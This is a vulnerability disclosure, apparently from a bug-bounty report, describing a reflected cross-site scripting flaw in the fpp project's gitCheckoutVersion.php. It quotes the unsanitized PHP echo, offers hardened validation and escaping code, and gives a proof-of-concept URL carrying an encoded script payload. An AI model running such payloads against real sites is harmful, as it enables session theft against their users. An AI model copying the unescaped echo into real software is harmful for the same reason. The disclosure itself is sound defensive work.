Cross-site Scripting (XSS) - Reflected in FalconChristmas/fpp

Valid
Reported on May 12th 2021

✍️ Description

In https://github.com/FalconChristmas/fpp/blob/721c99aed6897792bf7f79fa02a280995e27d409/www/gitCheckoutVersion.php#L26 you echo user input (the `version` query parameter) without sanitization:

Version: <? echo $_GET['version']; ?><br>
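A hardened version of that line, as an added example and not fpp's own code: the raw `$_GET['version']` is first checked against an allowlist pattern (the pattern is an assumption about what a git tag or branch name looks like) and then HTML-escaped before being echoed, so a value like the one in the proof of concept is rejected and, even if the allowlist were loosened, rendered as inert text rather than markup.

```php
<?php
// Added example (not fpp's code): hardened handling of the "version"
// query parameter echoed by gitCheckoutVersion.php. The allowed-character
// pattern is an assumption about valid git ref names; adjust to the
// project's real naming scheme.

// Returns the version string if it is well-formed, or null otherwise.
function sanitize_version(?string $raw): ?string
{
    if ($raw === null) {
        return null;
    }
    // Allowlist: letters, digits, dot, underscore, hyphen, slash; bounded length.
    // Angle brackets, quotes and whitespace never pass this check.
    if (!preg_match('/^[A-Za-z0-9._\/-]{1,64}$/', $raw)) {
        return null;
    }
    return $raw;
}

// Escapes a string for safe insertion into HTML text content.
// ENT_QUOTES also escapes single quotes; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$version = sanitize_version($_GET['version'] ?? null);
if ($version === null) {
    // Reject rather than echo back anything that is not a plausible ref name.
    http_response_code(400);
    echo 'Invalid version parameter';
    exit;
}

// Output-encode even the validated value; defence in depth.
echo 'Version: ' . h($version) . "<br>\n";
```

The same escaping should be applied anywhere else the `version` value is written into HTML, and a validated ref name is also what should be passed on to any git command the page runs.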

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/gitCheckoutVersion.php?version=a%3Cscript%3Ealert(%22zer0h%22);%3C/script%3E

💥 Impact

Reflected XSS: script supplied in the `version` query parameter is executed in the browser of anyone who opens the crafted URL.